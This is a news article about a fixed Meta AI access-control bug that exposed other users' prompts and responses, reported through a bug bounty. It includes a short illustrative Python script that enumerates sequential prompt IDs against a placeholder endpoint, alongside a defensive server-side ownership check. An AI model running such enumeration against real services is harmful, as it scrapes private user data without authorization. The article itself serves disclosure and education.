Meta Fixes Security Flaw That Exposed Private AI Prompts and Responses

Meta has patched a significant security vulnerability in its AI chatbot platform that allowed users to view private prompts and AI-generated responses belonging to other users. The bug was reported in late 2024 and has since been fixed, and Meta says it found no evidence it was exploited maliciously.

Security researcher Sandeep Hodkasia, founder of AppSecure, uncovered the flaw and reported it to Meta on December 26, 2024. In recognition of his responsible disclosure, Meta awarded him a $10,000 bug bounty. According to Hodkasia, the issue was resolved on January 24, 2025.

The vulnerability stemmed from how Meta AI lets users edit their prompts to regenerate responses. Hodkasia explained that during this editing process, Meta’s backend assigned a unique numeric identifier to each prompt and its associated AI output. By inspecting his browser’s network activity while editing a prompt, he discovered he could manually change that identifier and, in doing so, retrieve another user’s prompt and AI-generated content.

Hodkasia told TechCrunch that the prompt numbers generated by Meta’s servers were “easily guessable,” meaning a bad actor could have scraped private data at scale simply by cycling through prompt IDs with an automated script.
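TechCrunch’s report does not include the exact requests involved, but what Hodkasia describes is a classic insecure direct object reference (IDOR). The Python sketch below is purely illustrative of that class of attack: the endpoint URL, cookie name, and ID range are invented stand-ins, not Meta’s actual API.

```python
import requests

# Illustrative IDOR enumeration sketch. The endpoint, cookie name, and
# ID range below are hypothetical stand-ins, NOT Meta's real API.
BASE_URL = "https://example.com/api/prompts"  # placeholder endpoint

session = requests.Session()
session.cookies.set("session_id", "attackers-own-valid-session")

def fetch_prompt(prompt_id: int):
    """Request the prompt/response pair stored under a numeric ID."""
    resp = session.get(f"{BASE_URL}/{prompt_id}", timeout=10)
    # A vulnerable backend returns 200 with another user's data for any
    # valid ID; a correct one returns 403/404 for IDs the caller doesn't own.
    return resp.status_code, (resp.json() if resp.ok else None)

# Because the IDs were sequential ("easily guessable"), scraping is just
# a matter of walking the number space.
for pid in range(100_000, 100_010):
    status, data = fetch_prompt(pid)
    print(pid, status)
```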

At its core, this was a broken access control: Meta’s servers failed to verify that the person requesting the data was authorized to see it. Such a flaw posed serious privacy risks, especially for a tool that generates text and images from potentially sensitive user input.
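To make the missing check concrete, here is a minimal server-side sketch, assuming a generic Flask handler with invented route and field names; the point is the ownership comparison, which the vulnerable endpoint effectively skipped.

```python
from flask import Flask, abort, jsonify, session

app = Flask(__name__)
app.secret_key = "dev-only"  # required for Flask sessions; placeholder value

# Illustrative in-memory store; field names are invented for this sketch.
PROMPTS = {
    42: {"owner_id": "user-a", "prompt": "...", "response": "..."},
}

@app.route("/api/prompts/<int:prompt_id>")
def get_prompt(prompt_id: int):
    record = PROMPTS.get(prompt_id)
    if record is None:
        abort(404)
    # The decisive line: confirm the requester owns the record. The bug
    # Hodkasia reported amounts to this check being absent, so any valid
    # ID returned data regardless of who asked.
    if record["owner_id"] != session.get("user_id"):
        abort(404)  # 404 rather than 403 avoids confirming the ID exists
    return jsonify(record)
```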

Meta confirmed the bug had been fixed and reiterated that no abuse had been detected. “We found no evidence of abuse and rewarded the researcher,” Meta spokesperson Ryan Daniels told TechCrunch.

The issue comes at a time when major tech companies are accelerating the rollout of AI-powered tools, sometimes ahead of robust privacy and security measures. Meta AI, which launched its standalone chatbot earlier this year to rival platforms like ChatGPT, has already faced challenges, including users unintentionally making private conversations public.

As companies race to enhance and expand AI offerings, this incident highlights the importance of thorough security testing and responsible disclosure practices in safeguarding user data.
